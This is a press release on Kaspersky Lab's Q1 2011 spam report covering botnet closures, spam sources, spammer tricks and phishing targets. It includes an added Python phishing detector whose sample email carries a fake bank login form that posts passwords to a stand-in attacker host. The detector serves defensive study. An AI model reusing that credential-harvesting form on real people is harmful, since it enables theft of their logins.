Botnet closures fail to stem flow of spam in the first quarter of 2011

10 May
Spam News

Kaspersky Lab announces the publication of its quarterly spam report for Q1 2011.

Overview

The closure of the Rustock botnet command centers on 16 March 2011 did not impact spam traffic as dramatically as last year’s Pushdo/Cutwail and Bredolab closures: the quantity of spam fell by 2-3 percentage points for a day or two before bouncing back again. “This could be due to the closure of SpamIt, a large pharmaceutical partner program, and the fact that Rustock, which specialized in pharmaceutical spam, may well have ceased sending out mass mailings at the end of last year. It could be that the botnet was just used for different purposes. It is also possible that the cybercriminals themselves preferred to lie low for a while given the interest in botnets shown by law enforcement agencies in the latter stages of 2010,” explains Darya Gudkova, Head of Content Analysis & Research at Kaspersky Lab.

Overall, spam averaged 78.6% of mail traffic in the first quarter of 2011, an increase of 1.4 percentage points on the previous quarter but still 6.5 percentage points below the figure for the same period last year.

Sources of spam

In Q1 2011, the Asian and Latin American shares of worldwide spam grew (+2.93 and +3.85 percentage points respectively), while the shares originating from eastern and western Europe fell by 5.64 and 2.36 percentage points respectively. Africa joined the list of the most active spam sources: unsolicited messages sent from African countries accounted for 3.66% of the worldwide total, more than the USA and Canada combined. These figures are in line with Kaspersky Lab’s forecast that botnets would shift towards regions with weak or non-existent anti-spam legislation. However, current cybercriminal activity suggests that botnets will continue to be built in better protected regions as well, so that they remain spread relatively evenly across the globe, much as they are now.

Spammer tricks and techniques

In Q1 2011, spammers relied on some tried and tested tricks to bypass filtering. One was a spam email containing nothing but a link to a video clip advertising spammer services. Another was an email reading “Stop sending me spam”, supposedly written by an angry recipient of spam; the message was in fact spam itself, with a link leading to a spammer’s site. Unfortunately, Q1 also saw tragic events, including the earthquakes and major tsunami in Japan. Needless to say, spammers tried to capitalize on these events, posing as part of the humanitarian relief effort to trick users into parting with their money. (A fuller account of the events related to the Japanese earthquakes and tsunami is presented in the infographic “The Japan Crisis – An IT Security Timeline”.)

Malware in mail traffic

Trojan-Spy.HTML.Fraud.gen kept its leading position in the Top 10 malicious programs distributed via mail traffic in the first quarter of 2011. This Trojan takes the form of an HTML page that spoofs a legitimate site. It arrives with a phishing email containing a link to a fake site imitating that of a well-known bank or e-payment system, where the user is asked to enter a login and password; the fraudsters then use these credentials to access the victim’s confidential data.
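An HTML page of this kind works because the victim's browser posts the typed login and password to a form action under the attacker's control rather than to the bank. As an added illustration (not Kaspersky Lab's detection logic, and not code from the report), the Python below parses an email, scans every HTML part for a form with a password field, and flags the message when that form posts to a host outside the sender's domain. The sample message, its hostnames (`example-bank.test`, `collector.attacker.test`) and the attachment name are constructed for the example.

```python
"""Flag e-mails whose HTML parts carry a credential-harvesting form.

Heuristic: any HTML part (body or attachment) containing a <form> with a
password input whose action posts to a host outside the From: domain.
All hostnames below are invented for the example; nothing is contacted.
"""
import email
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormScanner(HTMLParser):
    """Record each <form> action and whether the form holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []      # list of {"action": str, "has_password": bool}
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action", ""), "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def parse(raw_bytes):
    """Parse raw RFC 5322 bytes with the modern (EmailMessage) policy."""
    return email.message_from_bytes(raw_bytes, policy=policy.default)


def sender_domain(msg):
    """Domain of the From: address, lower-cased (empty string if absent)."""
    addr = parseaddr(msg.get("From", ""))[1]
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def credential_forms(msg):
    """(part_name, action_host, has_password) for every form in every HTML part."""
    found = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        scanner = _FormScanner()
        scanner.feed(part.get_content())      # decoded text of the HTML part
        name = part.get_filename() or "<body>"
        for form in scanner.forms:
            host = (urlparse(form["action"]).hostname or "").lower()
            found.append((name, host, form["has_password"]))
    return found


def is_phishing_html(msg):
    """True when some HTML part posts a password to a host outside the sender's domain."""
    domain = sender_domain(msg)
    for _name, host, has_pw in credential_forms(msg):
        if has_pw and host and not (host == domain or host.endswith("." + domain)):
            return True
    return False


def build_sample(action="http://collector.attacker.test/login.php"):
    """Constructed sample: a 'bank' mail with an HTML attachment posting to `action`."""
    msg = EmailMessage()
    msg["From"] = "security@example-bank.test"
    msg["To"] = "victim@example.org"
    msg["Subject"] = "Please confirm your account"
    msg.set_content("Your account needs verification. Open the attached form.")
    html = f"""<html><body><h1>Example Bank - Online Banking</h1>
<form method="post" action="{action}">
  User ID: <input type="text" name="user"><br>
  Password: <input type="password" name="pass"><br>
  <input type="submit" value="Log in">
</form></body></html>"""
    msg.add_attachment(html, subtype="html", filename="secure_login.html")
    return msg


if __name__ == "__main__":
    m = parse(build_sample().as_bytes())
    for name, host, has_pw in credential_forms(m):
        print(f"{name}: posts to {host!r}, password field={has_pw}")
    print("phishing:", is_phishing_html(m))
```

The same check applied to a form whose action stays on `online.example-bank.test` is not flagged, which is the point of keying on the sender's domain rather than on the mere presence of a login form; a real filter would also compare the action host against the URLs in the message body and against the displayed brand, since the From: header itself is trivially spoofed.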

The most notable entries in the Top 10 malicious programs spread via email belonged to a single mail worm family, which accounted for four of the rating’s ten places. The main purpose of malware of this kind is to harvest email addresses and spread itself via mail traffic.

Phishing

In the first quarter of 2011 the volume of phishing emails was very small, accounting for only 0.03% of all mail traffic. PayPal and eBay remained in the unenviable position of being the organizations most frequently targeted by phishers. They were followed by Habbo, Facebook and former leader HSBC.

“Notably, in the first quarter of 2011 Google services such as Google AdWords and Google Checkout were attacked much less often. The phishers switched their attention to the highly popular Brazilian social network Orkut, which is owned by Google. The attacks on this social network reached 1.96% of the total, putting it in 12th place in the list of organizations most often targeted by phishers,” said Maria Namestnikova, Senior Spam Analyst at Kaspersky Lab. “It is worth mentioning that user accounts belonging to Google’s services, including Orkut, are interconnected. Thus, having acquired credentials for one of these accounts, a cybercriminal can access any Google service registered to the same user.”

View the full version of Spam in the First Quarter of 2011 at www.securelist.com/en.

Infographic: “The Japan Crisis – An IT Security Timeline”